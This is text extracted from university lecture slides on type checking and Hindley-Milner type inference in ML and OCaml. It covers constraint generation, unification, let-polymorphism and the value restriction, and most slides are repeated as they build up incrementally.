\[ t ::= \text{int} | \text{bool} | t \rightarrow t \]
\[ c ::= n | b \]
\[ o ::= + | - | < \]
\[ e ::= \]
\[ c \]
\[ | e \circ e \]
\[ | x \]
\[ | \text{if } e \text{ then } e \text{ else } e \]
\[ | \lambda x : t . e \]
\[ | e \ e \]
\[ | \text{let } x = e \text{ in } e \]
Rule for function call:
\[
\begin{align*}
G |\vdash e_1 : t_1 \rightarrow t_2 & \quad G |\vdash e_2 : t_1 \\
G |\vdash e_1 \ e_2 : t_2
\end{align*}
\]
English:
“if \( G \) extended with \( x : t \) proves \( e \) has type \( t_2 \) then \( \lambda x : t . e \) has type \( t \rightarrow t_2 \)"
Typing Contexts and Free Variables
\[ t ::= \text{int} \mid \text{bool} \mid t \rightarrow t \]
\[ c ::= n \mid b \]
\[ o ::= + \mid - \mid < \]
\[ e ::= \]
\[ c \]
\[ | e \circ e \]
\[ | x \]
\[ | \text{if e then e else e} \]
\[ | \lambda x : t . e \]
\[ | e \circ e \]
\[ | \text{let x = e in e} \]
Rule for let:
\[
\begin{align*}
G & \vdash e_1 : t_1 & G,x : t_1 & \vdash e_2 : t_2 \\
G & \vdash \text{let x = e}_1 \text{ in e}_2 : t_2
\end{align*}
\]
English:
“if e_1 has type t_1 and G extended with x:t_1 proves e_2 has type t_2 then let x = e_1 in e_2 has type t_2 "
A typing derivation is a "proof" that an expression is well-typed in a particular context.
Such proofs consist of a tree of valid rules, with no obligations left unfulfilled at the top of the tree. (ie: no axioms left over).
notice that “int” is associated with x in the context
\[
\begin{align*}
G, x: \text{int} & \vdash x : \text{int} \quad G, x: \text{int} \vdash 2 : \text{int} \\
G, x: \text{int} & \vdash x + 2 : \text{int} \\
G & \vdash \lambda x: \text{int. } x + 2 : \text{int} \to \text{int}
\end{align*}
\]
Key Properties
Good type systems are *sound*.
- ie, well-typed programs have "well-defined" evaluation
- ie, our interpreter should not raise an exception part-way through because it doesn't know how to continue evaluation
- colloquial phrase: “sound type systems do not go wrong”
Examples of OCaml expressions that go wrong:
- true + 3 (addition of booleans not defined)
- let (x,y) = 17 in ... (can’t extract fields of int)
- true (17) (can’t use a bool as if it is a function)
Sound type systems *accurately* predict run time behavior
- if e : int and e terminates then e evaluates to an integer
Soundness = Progress + Preservation
Proving soundness boils down to two theorems:
**Progress Theorem:**
If |- e : t then either:
(1) e is a value, or
(2) e --> e'
**Preservation Theorem:**
If |- e : t and e --> e' then |- e' : t
See COS 510 for proofs of these theorems.
But you have most of the necessary techniques:
Proof by induction on the structure of ...
... various inductive data types. :-}
The typing rules also define an algorithm for... type checking...
If you view G and e as inputs, the rules for “G |- e : t” tell you how to compute t (see demo code)
TYPE INFERENCE
For three distinct and complete achievements:
1. LCF, the mechanization of Scott's Logic of Computable Functions, probably the first theoretically based yet practical tool for machine assisted proof construction;
2. ML, the first language to include polymorphic type inference together with a type-safe exception-handling mechanism;
3. CCS, a general theory of concurrency.
In addition, he formulated and strongly advanced full abstraction, the study of the relationship between operational and denotational semantics.
Robin Milner
For three distinct and complete achievements:
1. LCF, the mechanization of Scott's Logic of Computable Functions, probably the first theoretically based yet practical tool for machine assisted proof construction;
2. ML, the first language to include polymorphic type inference together with a type-safe exception-handling mechanism;
3. CCS, a general theory of concurrency.
In addition, he formulated and strongly advanced full abstraction, the study of the relationship between operational and denotational semantics.
We will be studying Hindley-Milner type inference. Discovered by Hindley, rediscovered by Milner. Formalized by Damas. Broken several times when effects were added to ML.
The ML language and type system is designed to support a very strong form of type inference.
```
let rec map f l =
match l with
[ ] -> [ ]
| hd::tl -> f hd :: map f tl
```
It’s very convenient we don’t have to annotate f and l with their types, as is required by our type checking algorithm.
The ML language and type system is designed to support a very strong form of type inference.
```
let rec map f l =
match l with
[ ] -> [ ]
| hd::tl -> f hd :: map f tl
```
ML finds this type for map:
```
map : ('a -> 'b) -> 'a list -> 'b list
```
The ML language and type system is designed to support a very strong form of type inference.
```ml
let rec map f l =
match l with
[ ] -> [ ]
| hd::tl -> f hd :: map f tl
```
ML finds this type for map:
```
map : ('a -> 'b) -> 'a list -> 'b list
```
which is really an abbreviation for this type:
```
map : forall 'a,'b.('a -> 'b) -> 'a list -> 'b list
```
We call this type the *principle type (scheme)* for `map`.
Any other ML-style type you can give `map` is *an instance* of this type, meaning we can obtain the other types via *substitution* of types for parameters from the principle type.
**Eg:**
- `(bool -> int) -> bool list -> int list`
- `('a -> int) -> 'a list -> int list`
- `('a -> 'a) -> 'a list -> 'a list`
Principle types are great:
- the type inference engine can make a *best choice* for the type to give an expression
- the engine doesn't have to guess (and won't have to guess wrong)
The fact that principle types exist is surprisingly brittle. If you change ML's type system a little bit in either direction, it can fall apart.
Suppose we take out polymorphic types and need a type for id:
```ocaml
let id x = x
```
Then the compiler might guess that id has one (and only one) of these types:
```ocaml
id : bool -> bool
id : int -> int
```
Suppose we take out polymorphic types and need a type for id:
```ocaml
let id x = x
```
Then the compiler might guess that id has one (and only one) of these types:
```
id : bool -> bool
id : int -> int
```
But later on, one of the following code snippets won't type check:
```
id true
id 3
```
So whatever choice is made, a different one might have been better.
We showed that removing types from the language causes a failure of principle types.
Does adding more types always make type inference easier?
We showed that removing types from the language causes a failure of principle types.
Does adding more types always make type inference easier?
Nope!
OCaml has universal types on the outside ("prenex quantification"):
forall 'a,'b. (('a -> 'b) -> 'a list -> 'b list)
It does not have types like this:
((forall 'a.'a -> int) -> int -> bool)
argument type has its own polymorphic quantifier
Consider this program:
```ocaml
let f g = (g true, g 3)
```
notice that parameter g is used inside f as if:
- 1. it’s argument can have type bool, \textit{AND}
- 2. it’s argument can have type int
Consider this program:
```plaintext
let f g = (g true, g 3)
```
notice that parameter g is used inside f as if:
1. it’s argument can have type bool, AND
2. it’s argument can have type int
Does the following type work?
```plaintext
('a -> int) -> int * int
```
Consider this program:
\[
\text{let } f \ g = (g \text{ true}, \ g \ 3)
\]
notice that parameter \( g \) is used inside \( f \) as if:
1. it’s argument can have type \( \text{bool} \), \textbf{AND}
2. it’s argument can have type \( \text{int} \)
Does the following type work?
\[
(\ 'a \rightarrow \text{int} ) \rightarrow \text{int} \ast \text{int}
\]
\textbf{NO:} this says \( g \)'s argument can be any type \( 'a \) (it could be \( \text{int} \) or \( \text{bool} \))
\textit{Consider} \( g \) is (fun \( x \rightarrow x + 2 \) : int -> int.
Unfortunately, \( f \ g \) goes wrong when \( g \) applied to true inside \( f \).
Consider this program again:
```ocaml
let f g = (g true, g 3)
```
We might want to give it this type:
```ocaml
f : (forall a.a->a) -> bool * int
```
Notice that the universal quantifier appears left of ->
System F is a lot like OCaml, except that it allows universal quantifiers in any position. It could type check f.
```
let f g = (g true, g 3)
```
```
f : (forall a.a->a) -> bool * int
```
Unfortunately, type inference in System F is undecidable.
System F is a lot like OCaml, except that it allows universal quantifiers in any position. It could type check f.
\[
\text{let } f \ g = (g \text{ true}, \ g \text{ 3})
\]
\[
f : (\forall a. a \rightarrow a) \rightarrow \text{bool} \times \text{int}
\]
Unfortunately, type inference in System F is undecideable.
Developed in 1972 by logician Jean Yves-Girard who was interested in the consistency of a logic of 2nd-order arithmetic.
Rediscovered as programming language by John Reynolds in 1974.
Even seemingly small changes can effect type inference.
Suppose "\+" operated on both floats and ints. What type for this?
```
let f x = x + x
```
Language Design for Type Inference
Even seemingly small changes can effect type inference.
Suppose "+" operated on both floats and ints. What type for this?
```ocaml
let f x = x + x
f : int -> int
f : float -> float
```
Even seemingly small changes can effect type inference.
Suppose "+" operated on both floats and ints. What type for this?
```plaintext
let f x = x + x
f : int -> int
f : float -> float
f : 'a -> 'a
```
Language Design for Type Inference
Even seemingly small changes can effect type inference.
Suppose "+" operated on both floats and ints. What type for this?
```plaintext
let f x = x + x
f : int -> int ?
f : float -> float ?
f : 'a -> 'a ?
```
No type in OCaml's type system works. In Haskell:
```plaintext
f : Num 'a => 'a -> 'a
```
INFERRING SIMPLE TYPES
A type scheme contains type variables that may be filled in during type inference
\[ s ::= a \mid \text{int} \mid \text{bool} \mid s \to s \]
A term scheme is a term that contains type schemes rather than proper types. eg, for functions:
\[
\text{fun (x:s) -> e}
\]
\[
\text{let rec f (x:s) : s = e}
\]
Two Algorithms for Inferring Types
Algorithm 1:
• Declarative; generates constraints to be solved later
• Easier to understand
• Easier to prove correct
• Less efficient, not used in practice
Algorithm 2:
• Imperative; solves constraints and updates as-you-go
• Harder to understand
• Harder to prove correct
• More efficient, used in practice
• See: http://okmij.org/ftp/ML/generalization.html
Algorithm 1
1) Add distinct variables in all places type schemes are needed
Algorithm 1
1) Add distinct variables in all places type schemes are needed
2) Generate constraints (equations between types) that must be satisfied in order for an expression to type check
• Notice the difference between this and the type checking algorithm from last time. Last time, we tried to:
• eagerly deduce the concrete type when checking every expression
• reject programs when types didn't match. eg:
\[ f \ e \quad \text{-- f's argument type must equal e} \]
• This time, we'll collect up equations like:
\[ a \to b = c \]
Algorithm 1
1) Add distinct variables in all places type schemes are needed
2) Generate constraints (equations between types) that must be satisfied in order for an expression to type check
- Notice the difference between this and the type checking algorithm from last time. Last time, we tried to:
- eagerly deduce the concrete type when checking every expression
- reject programs when types didn't match. eg:
\[
\text{f e} \quad \text{-- f's argument type must equal e}
\]
- This time, we'll collect up equations like:
\[
\text{a -> b = c}
\]
3) Solve the equations, generating substitutions of types for var's
Example: Inferring types for map
```ocaml
let rec map f l =
match l with
| [] -> []
| hd::tl -> f hd :: map f tl
```
let rec map (f:a) (l:b) : c =
match l with
| [] -> []
| hd::tl -> f hd :: map f tl
let rec map (f:a) (l:b) : c =
match l with
| [] -> []
| hd::tl -> f hd :: map f tl
Step 2: Generate Constraints
```
let rec map (f:a) (l:b) : c =
match l with
| [] -> []
| hd::tl -> f hd ::: map f tl
```
final constraints:
- \( b = b' \) list
- \( b = b'' \) list
- \( b = b''' \) list
- \( a = a \)
- \( b = b''' \) list
- \( a = b'' \rightarrow a' \)
- \( c = c' \) list
- \( a' = c' \)
- \( d \) list = \( c' \) list
- \( d \) list = \( c \)
Step 3: Solve Constraints
```
let rec map (f:a) (l:b) : c =
match l with
[] -> []
| hd::tl -> f hd ::: map f tl
```
**final constraints:**
\[
\begin{align*}
b &= b' \text{ list} \\
b &= b'' \text{ list} \\
b &= b''' \text{ list} \\
a &= a \\
b &= b''' \text{ list} \\
a &= b'' \rightarrow a' \\
c &= c' \text{ list} \\
a' &= c' \\
d \text{ list} &= c' \text{ list} \\
d \text{ list} &= c
\end{align*}
\]
**final solution:**
\[
\begin{align*}
[b' \rightarrow c'/a] \\
[b' \text{ list}/b] \\
[c' \text{ list}/c]
\end{align*}
\]
Step 3: Solve Constraints
let rec map (f:a) (l:b) : c =
match l with
[] -> []
| hd::tl -> f hd :: map f tl
final solution:
[b' -> c'/a]
[b' list/b]
[c' list/c]
let rec map (f:b' -> c') (l:b' list) : c' list =
match l with
[] -> []
| hd::tl -> f hd :: map f tl
Step 3: Solve Constraints
```ml
let rec map (f:a) (l:b) : c =
match l with
| [] -> []
| hd::tl -> f hd :: map f tl
```
renaming type variables:
```ml
let rec map (f:a -> b) (l:a list) : b list =
match l with
| [] -> []
| hd::tl -> f hd :: map f tl
```
Type Inference Details
Type constraints are sets of equations between type schemes
- q ::= \{s_{11} = s_{12}, \ldots, s_{n1} = s_{n2}\}
- eg: \{b = b’ list, a = b \rightarrow c\}
Syntax-directed constraint generation
- our algorithm crawls over abstract syntax of untyped expressions and generates
- a term scheme
- a set of constraints
Syntax-directed constraint generation
- Our algorithm crawls over abstract syntax of untyped expressions and generates
- a term scheme
- a set of constraints
Algorithm defined as set of inference rules:
\[ G |--- u \Rightarrow e : t, q \]
- context
- unannotated expression
- annotated expression
- type (scheme)
- constraints that must be solved
Syntax-directed constraint generation
- our algorithm crawls over abstract syntax of untyped expressions and generates
- a term scheme
- a set of constraints
Algorithm defined as set of inference rules:
- \( G |- u \Rightarrow e : t, q \)
constraints that must be solved
context
unannotated expression
annotated expression
type (scheme)
in OCaml:
\[
\text{gen : ctxt} \rightarrow \text{exp} \rightarrow \text{ann_exp} \ast \text{scheme} \ast \text{constraints}
\]
Constraint Generation
Simple rules:
- $G \vdash x \Rightarrow x : s, \{\} \quad (\text{if } G(x) = s)$
- $G \vdash 3 \Rightarrow 3 : \text{int}, \{\} \quad (\text{same for other ints})$
- $G \vdash \text{true} \Rightarrow \text{true} : \text{bool}, \{\}$
- $G \vdash \text{false} \Rightarrow \text{false} : \text{bool}, \{\}$
If statements
G |-- u1 ==> e1 : t1, q1
G |-- u2 ==> e2 : t2, q2
G |-- u3 ==> e3 : t3, q3
G |-- if u1 then u2 else u3 ==> if e1 then e2 else e3
: a, q1 U q2 U q3 U \{t1 = bool, a = t2, a = t3\}
G |-- u1 ==> e1 : t1, q1
G |-- u2 ==> e2 : t2, q2 (for a fresh a)
---------------------------------------------
G |-- u1 u2 ==> e1 e2 : a, q1 U q2 U \{t1 = t2 -> a\}
Function Declaration
\[
G, x : a |\vdash u \Rightarrow e : t, q \quad \text{ (for fresh } a) \\
\hline \\
G |\vdash \text{fun } x \rightarrow e \Rightarrow \text{fun } (x : a) \rightarrow e : a \rightarrow b, \quad q \cup \{t = b\}
\]
G, f : a -> b, x : a |-- u ==> e : t, q (for fresh a,b)
---------------------------------------------
G |-- rec f(x) = u ==> rec f (x : a) : b = e : a -> b, q U {t = b}
A solution to a system of type constraints is a substitution $S$
- a function from type variables to types
- assume substitutions are defined on all type variables:
- $S(a) = a$ (for almost all variables $a$)
- $S(a) = s$ (for some type scheme $s$)
- $\text{dom}(S) = \text{set of variables s.t. } S(a) \neq a$
Solving Constraints
A solution to a system of type constraints is a substitution $S$
- a function from type variables to types
- assume substitutions are defined on all type variables:
- $S(a) = a$ (for almost all variables $a$)
- $S(a) = s$ (for some type scheme $s$)
- $\text{dom}(S) =$ set of variables s.t. $S(a) \neq a$
We can also apply a substitution $S$ to a full type scheme $s$.
apply: $[ \text{int}/a, \text{int}\rightarrow\text{bool}/b ]$
to: $b \rightarrow a \rightarrow b$
returns: $(\text{int}\rightarrow\text{bool}) \rightarrow \text{int} \rightarrow (\text{int}\rightarrow\text{bool})$
When is a substitution $S$ a solution to a set of constraints?
Constraints: \{ $s_1 = s_2$, $s_3 = s_4$, $s_5 = s_6$, ... \}
When the substitution makes both sides of all equations the same.
Eg:
```
constraints:
a = b -> c
c = int -> bool
```
Substitutions
When is a substitution $S$ a solution to a set of constraints?
Constraints: \{ $s_1 = s_2$, $s_3 = s_4$, $s_5 = s_6$, ... \}
When the substitution makes both sides of all equations the same.
Eg:
<table>
<thead>
<tr>
<th>constraints:</th>
<th>solution:</th>
</tr>
</thead>
<tbody>
<tr>
<td>$a = b \rightarrow c$</td>
<td>$b \rightarrow (\text{int} \rightarrow \text{bool})/a$</td>
</tr>
<tr>
<td>$c = \text{int} \rightarrow \text{bool}$</td>
<td>$\text{int} \rightarrow \text{bool}/c$</td>
</tr>
<tr>
<td>$b/b$</td>
<td>$b/b$</td>
</tr>
</tbody>
</table>
When is a substitution $S$ a solution to a set of constraints?
Constraints: \{ $s_1 = s_2$, $s_3 = s_4$, $s_5 = s_6$, ... \}
When the substitution makes both sides of all equations the same.
Eg:
constraints:
\begin{align*}
a &= b \rightarrow c \\
c &= \text{int} \rightarrow \text{bool}
\end{align*}
solution:
\begin{align*}
b &\rightarrow (\text{int} \rightarrow \text{bool})/a \\
\text{int} &\rightarrow \text{bool}/c \\
b/b
\end{align*}
constraints with solution applied:
\begin{align*}
b &\rightarrow (\text{int} \rightarrow \text{bool}) = b \rightarrow (\text{int} \rightarrow \text{bool}) \\
\text{int} &\rightarrow \text{bool} = \text{int} \rightarrow \text{bool}
\end{align*}
When is a substitution $S$ a solution to a set of constraints?
Constraints: \{ s_1 = s_2, s_3 = s_4, s_5 = s_6, ... \}
When the substitution makes both sides of all equations the same.
A second solution
constraints:
\[
\begin{align*}
a & = b \rightarrow c \\
c & = \text{int} \rightarrow \text{bool}
\end{align*}
\]
solution 1:
\[
\begin{align*}
b & \rightarrow (\text{int} \rightarrow \text{bool})/a \\
\text{int} & \rightarrow \text{bool}/c \\
b & /b
\end{align*}
\]
solution 2:
\[
\begin{align*}
\text{int} & \rightarrow (\text{int} \rightarrow \text{bool})/a \\
\text{int} & \rightarrow \text{bool}/c \\
\text{int} & /b
\end{align*}
\]
When is one solution better than another to a set of constraints?
constraints:
\[
\begin{align*}
a &= b \rightarrow c \\
c &= \text{int} \rightarrow \text{bool}
\end{align*}
\]
solution 1:
\[
\begin{align*}
b &\rightarrow (\text{int} \rightarrow \text{bool})/a \\
\text{int} &\rightarrow \text{bool}/c \\
b/b
\end{align*}
\]
type b \rightarrow c with solution applied:
\[
b \rightarrow (\text{int} \rightarrow \text{bool})
\]
solution 2:
\[
\begin{align*}
\text{int} &\rightarrow (\text{int} \rightarrow \text{bool})/a \\
\text{int} &\rightarrow \text{bool}/c \\
\text{int}/b
\end{align*}
\]
type b \rightarrow c with solution applied:
\[
\text{int} \rightarrow (\text{int} \rightarrow \text{bool})
\]
Solution 1 is "more general" – there is more flex.
Solution 2 is "more concrete"
We prefer solution 1.
Solution 1 is "more general" – there is more flex.
Solution 2 is "more concrete"
We prefer the more general (less concrete) solution 1.
Technically, we prefer T to S if there exists another substitution U and for all types t, $S(t) = U(T(t))$
There is always a *best* solution, which we can a *principle solution*. The best solution is (at least as) preferred as any other solution.
Examples
Example 1
- $q = \{a=\text{int}, b=a\}$
- principal solution $S$:
Example 1
- $q = \{a=\text{int}, \ b=a\}$
- principal solution $S$:
- $S(a) = S(b) = \text{int}$
- $S(c) = c$ (for all $c$ other than $a, b$)
Example 2
- $q = \{a=\text{int}, b=a, b=\text{bool}\}$
- principal solution $S$:
Example 2
- \( q = \{ a=\text{int}, \ b=a, \ b=\text{bool} \} \)
- principal solution \( S \):
- does not exist (there is no solution to \( q \))
Unification: An algorithm that provides the principal solution to a set of constraints (if one exists)
- Unification systematically simplifies a set of constraints, yielding a substitution
- Starting state of unification process: (I,q)
- Final state of unification process: (S, { })
Unification simplifies equations step-by-step until
• there are no equations left to simplify, or
• we find basic equations are inconsistent and we fail
```
type ustate = substitution * constraints
unify_step : ustate -> ustate
```
Unification
Unification simplifies equations step-by-step until
• there are no equations left to simplify, or
• we find basic equations are inconsistent and we fail
```plaintext
type ustate = substitution * constraints
unify_step : ustate -> ustate
unify_step (S, {bool=bool} U q) = (S, q)
unify_step (S, {int=int} U q) = (S, q)
```
Unification simplifies equations step-by-step until
• there are no equations left to simplify, or
• we find basic equations are inconsistent and we fail
\[
type \text{ ustate} = \text{substitution} \times \text{constraints} \\
\text{unify\_step} : \text{ustate} -> \text{ustate}
\]
\[
\text{unify\_step} (S, \{\text{bool} = \text{bool}\} \cup q) = (S, q) \\
\text{unify\_step} (S, \{\text{int} = \text{int}\} \cup q) = (S, q) \\
\text{unify\_step} (S, \{a = a\} \cup q) = (S, q)
\]
Unification
Unification simplifies equations step-by-step until
- there are no equations left to simplify, or
- we find basic equations are inconsistent and we fail
\[
\text{type ustate} = \text{substitution} \ast \text{constraints}
\]
\[
\text{unify\_step} : \text{ustate} \rightarrow \text{ustate}
\]
\[
\text{unify\_step} (S, \{A \rightarrow B = C \rightarrow D\} \cup q) = (S, \{A = C, B = D\} \cup q)
\]
Unification simplifies equations step-by-step until
- there are no equations left to simplify, or
- we find basic equations are inconsistent and we fail
Unification
\[
\text{unify\_step} \colon \text{ustate} \rightarrow \text{ustate}
\]
\[
\text{unify\_step} \ (S, \ \{A \rightarrow B = C \rightarrow D\} \ U \ q)
\]
\[
= (S, \ \{A = C, \ B = D\} \ U \ q)
\]
Unification
\[
\text{unify\_step} \ (S, \ \{a=s\} \ U \ q) \ = \ ([s/a] \ o \ S, \ [s/a]q)
\]
*when a is not in FreeVars(s)*
Unification
Unify step \( S, \{a=s\} \cup q \) = ([s/a] \circ S, [s/a]q)
when \( a \) is not in \( \text{FreeVars}(s) \)
the substitution \( S' \) defined to:
do \( S \) then substitute \( s \) for \( a \)
the constraints \( q' \) defined to:
be like \( q \) except \( s \) replacing \( a \)
Recall this program:
\[
\text{fun x -> x x}
\]
It generates the constraints: \( a \rightarrow a = a \)
What is the solution to \( \{a = a \rightarrow a\} \)?
Recall this program:
```
fun x -> x x
```
It generates the constraints: \( a \rightarrow a = a \)
What is the solution to \( \{ a = a \rightarrow a \} \)?
There is none!
Notice that \( a \) does appear in \( \text{FreeVars}(s) \)
Whenever \( a \) appears in \( \text{FreeVars}(s) \) and \( s \) is not just \( a \), there is no solution to the system of constraints.
Recall this program:
\[
\text{fun } x \rightarrow x
\]
It generates the constraints: \( a \rightarrow a = a \)
What is the solution to \( \{a = a \rightarrow a\} \)?
There is none!
"when a is not in FreeVars(s)" is known as the "occurs check"
Recall: unification simplifies equations step-by-step until
• there are no equations left to simplify:
\[ (S, \{ \}) \]
no constraints left.
S is the final solution!
Irreducible States
Recall: unification simplifies equations step-by-step until
- there are no equations left to simplify:
\[(S, \{ \})\]
no constraints left. \(S\) is the final solution!
- or we find basic equations are inconsistent:
- \(\text{int} = \text{bool}\)
- \(s_1 \rightarrow s_2 = \text{int}\)
- \(s_1 \rightarrow s_2 = \text{bool}\)
- \(a = s\) \((s\) contains \(a)\)
(or is symmetric to one of the above)
In the latter case, the program does not type check.
TYPE INFERENCE
MORE DETAILS
Generalization
Where do we introduce polymorphic values? Consider:
```plaintext
g (fun x -> 3)
```
It is tempting to do something like this:
```plaintext
(fun x -> 3) : forall a. a -> int
```
```plaintext
g : (forall a. a -> int) -> int
```
But recall the beginning of the lecture:
if we aren’t careful, we run into decidability issues
Where do we introduce polymorphic values?
In ML languages: Only when values bound in "let declarations"
\[
g (\text{fun } x \rightarrow 3)
\]
No polymorphism for \text{fun } x \rightarrow 3!
\[
\text{let } f : \forall a. a \rightarrow a = \text{fun } x \rightarrow 3 \text{ in } g f
\]
Yes polymorphism for \text{f}!
Where do we introduce polymorphic values?
**Rule:**
- if \( v \) is a value (or guaranteed to evaluate to a value without effects)
- OCaml has some rules for this
- and \( v \) has type scheme \( s \)
- and \( s \) has free variables \( a, b, c, ... \)
- and \( a, b, c, ... \) do not appear in the types of other values in the context
- then \( x \) can have type \( \forall a, b, c. s \)
Let Polymorphism
Where do we introduce polymorphic values?
let x = v
Rule:
• if v is a value (or guaranteed to evaluate to a value without effects)
• OCaml has some rules for this
• and v has type scheme s
• and s has free variables a, b, c, ...
• and a, b, c, ... do not appear in the types of other values in the context
• then x can have type forall a, b, c. s
That’s a hell of a lot more complicated than you thought, eh?
Unsound Generalization Example
Consider this function f – a fancy identity function:
\[
\text{let } f = \text{fun } x \rightarrow \text{let } y = x \text{ in } y
\]
A sensible type for f would be:
\[
f : \text{forall } a. \ a \rightarrow a
\]
Unsound Generalization Example
Consider this function f – a fancy identity function:
\[
\text{let } f = \text{fun } x \rightarrow \text{let } y = x \text{ in } y
\]
A bad (unsound) type for f would be:
\[
f : \text{forall } a, b. \ a \rightarrow b
\]
Consider this function f – a fancy identity function:
```
let f = fun x -> let y = x in y
```
A bad (unsound) type for f would be:
```
f : forall a, b. a -> b
```
```
(f true) + 7
```
goes wrong! but if f can have the bad type, it all type checks. This *counterexample* to soundness shows that f can’t possible be given the bad type safely.
Now, consider doing type inference:
\[
\text{let } f = \text{fun } x \rightarrow \text{let } y = x \text{ in } y
\]
\[x : a\]
Now, consider doing type inference:
```plaintext
let f = fun x -> let y = x in y
```
suppose we generalize and allow `y : forall a.a`
Now, consider doing type inference:
```
let f = fun x -> let y = x in y
```
Suppose we generalize and allow $y : \forall a.a$.
Then we can use $y$ as if it has any type, such as $y : b$.
$x : a$
Now, consider doing type inference:
```ml
let f = fun x -> let y = x in y
```
then we can use \( y \) as if it has any type, such as \( y : b \)
suppose we generalize and allow \( y : \text{forall } a.a \)
but now we have inferred that (\( \text{fun } x \to ... \)) : \( a \to b \)
and if we generalize again, \( f : \text{forall } a,b. \ a \to b \)
That’s the bad type!
Now, consider doing type inference:
```ocaml
let f = fun x -> let y = x in y
```
Suppose we generalize and allow `y : forall a.a`.
This was the bad step – `y` can’t really have any type at all. It’s type has got to be the same as whatever the argument `x` is.
`x` was in the context when we tried to generalize `y`!
The Value Restriction
```
let x = v
```
this has got to be a value to enable polymorphic generalization
Unsound Generalization Again
not a value!
let x = ref [] in
x : forall a . a list ref
Unsound Generalization Again
let x = ref [] in
x := [true];
not a value!
x : forall a . a list ref
use x at type bool as if x : bool list ref
Unsound Generalization Again
```ocaml
let x = ref [] in
x := [true];
List.hd (!x) + 3
```
- `x : forall a . a list ref`
- `use x at type bool as if x : bool list ref`
- `use x at type int as if x : int list ref`
and we crash ....
What does OCaml do?
```ocaml
let x = ref [] in
x : '_weak1 list ref
```
- a "weak" type variable can't be generalized
- means "I don't know what type this is but it can only be one particular type"
- look for the "_" to begin a type variable name
What does OCaml do?
```ocaml
let x = ref [] in
x := [true];
```
The "weak" type variable is now fixed as a bool and can’t be anything else.
bool was substituted for '_weak during type inference.
What does OCaml do?
```ocaml
let x = ref [] in
x := [true];
List.hd (!x) + 3
```
```
x : '_weak1 list ref
```
```
x : bool list ref
```
**Error:** This expression has type bool but an expression was expected of type int
**type error ...**
One other example
notice that the RHS is now a value – it happens to be a function value but any sort of value will do
let x = fun () -> ref [] in
now generalization is allowed
x : forall 'a. unit -> 'a list ref
One other example
notice that the RHS is now a value – it happens to be a function value but any sort of value will do
```ocaml
let x = fun () -> ref [] in
x () := [true];
```
now generalization is allowed
```ocaml
x : forall 'a. unit -> 'a list ref
x () : bool list ref
```
One other example
notice that the RHS is now a value – it happens to be a function value but any sort of value will do
```
let x = fun () -> ref [] in
x () := [true];
List.hd (!x ()) + 3
```
what is the result of this program?
```
x : forall 'a. unit -> 'a list ref
x () : bool list ref
x () : int list ref
```
One other example
notice that the RHS is now a value – it happens to be a function value but any sort of value will do
```
let x = fun () -> ref [] in
x () := [true];
List.hd (!x ()) + 3
```
now generalization is allowed
```
x : forall 'a. unit -> 'a list ref
x () : bool list ref
x () : int list ref
```
what is the result of this program?
List.hd raises an exception because it is applied to the empty list. Why?
One other example
notice that the RHS is now a value – it happens to be a function value but any sort of value will do
what is the result of this program?
List.hd raises an exception because it is applied to the empty list. why?
TYPE INFERENCE:
THINGS TO REMEMBER
Type Inference: Things to remember
**Declarative algorithm:** Given a context G, and untyped term u:
- Find e, t, q such that G |- u => e : t, q
- understand the constraints that need to be generated
- Find substitution S that acts as a solution to q via unification
- if no solution exists, there is no reconstruction
- Apply S to e, ie our solution is S(e)
- S(e) contains schematic type variables a,b,c, etc that may be instantiated with any type
- Since S is principal, S(e) characterizes all reconstructions.
- If desired, use the type checking algorithm to validate
In order to introduce polymorphic quantifiers, remember:
– Quantifiers must be on the outside only
• this is called “prenex” quantification
• otherwise, type inference may become undecidable
– Quantifiers can only be introduced at let bindings:
• let x = v
• only the type variables that do not appear in the environment may be generalized
– The expression on the right-hand side must be a value
• no references or exceptions
|
{"Source-Url": "https://www.cs.princeton.edu/courses/archive/fall18/cos326/lec/17-type-checking.pdf", "len_cl100k_base": 12419, "olmocr-version": "0.1.53", "pdf-total-pages": 125, "total-fallback-pages": 0, "total-input-tokens": 183143, "total-output-tokens": 17628, "length": "2e13", "weborganizer": {"__label__adult": 0.0003707408905029297, "__label__art_design": 0.0003457069396972656, "__label__crime_law": 0.00027441978454589844, "__label__education_jobs": 0.0006237030029296875, "__label__entertainment": 7.706880569458008e-05, "__label__fashion_beauty": 0.0001347064971923828, "__label__finance_business": 0.00012671947479248047, "__label__food_dining": 0.0004258155822753906, "__label__games": 0.0006070137023925781, "__label__hardware": 0.0005736351013183594, "__label__health": 0.00037550926208496094, "__label__history": 0.0002410411834716797, "__label__home_hobbies": 8.463859558105469e-05, "__label__industrial": 0.0003223419189453125, "__label__literature": 0.00032210350036621094, "__label__politics": 0.0002409219741821289, "__label__religion": 0.000530242919921875, "__label__science_tech": 0.00748443603515625, "__label__social_life": 0.00011622905731201172, "__label__software": 0.0034503936767578125, "__label__software_dev": 0.982421875, "__label__sports_fitness": 0.0003070831298828125, "__label__transportation": 0.0004508495330810547, "__label__travel": 0.00018608570098876953}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 39268, 0.00956]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 39268, 0.22696]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 39268, 0.75886]], "google_gemma-3-12b-it_contains_pii": [[0, 59, false], [59, 270, null], [270, 619, null], [619, 898, null], [898, 1638, null], [1638, 2164, null], [2164, 2798, null], [2798, 3142, null], [3142, 3524, null], [3524, 3947, null], [3947, 4307, null], [4307, 4553, null], [4553, 4780, null], [4780, 4991, null], [4991, 5315, null], [5315, 6094, null], [6094, 6641, null], [6641, 7107, null], [7107, 7330, null], [7330, 7941, null], [7941, 8523, null], [8523, 9045, null], [9045, 9654, null], [9654, 10058, null], [10058, 10225, null], [10225, 10240, null], [10240, 10763, null], [10763, 11472, null], [11472, 11778, null], [11778, 12038, null], [12038, 12403, null], [12403, 12771, null], [12771, 13100, null], [13100, 13315, null], [13315, 13684, null], [13684, 13828, null], [13828, 13979, null], [13979, 14223, null], [14223, 14423, null], [14423, 14688, null], [14688, 15323, null], [15323, 15532, null], [15532, 15781, null], [15781, 16282, null], [16282, 16431, null], [16431, 16656, null], [16656, 16863, null], [16863, 17202, null], [17202, 17225, null], [17225, 17532, null], [17532, 17929, null], [17929, 18006, null], [18006, 18575, null], [18575, 19246, null], [19246, 19377, null], [19377, 19472, null], [19472, 19562, null], [19562, 19932, null], [19932, 20467, null], [20467, 20738, null], [20738, 21017, null], 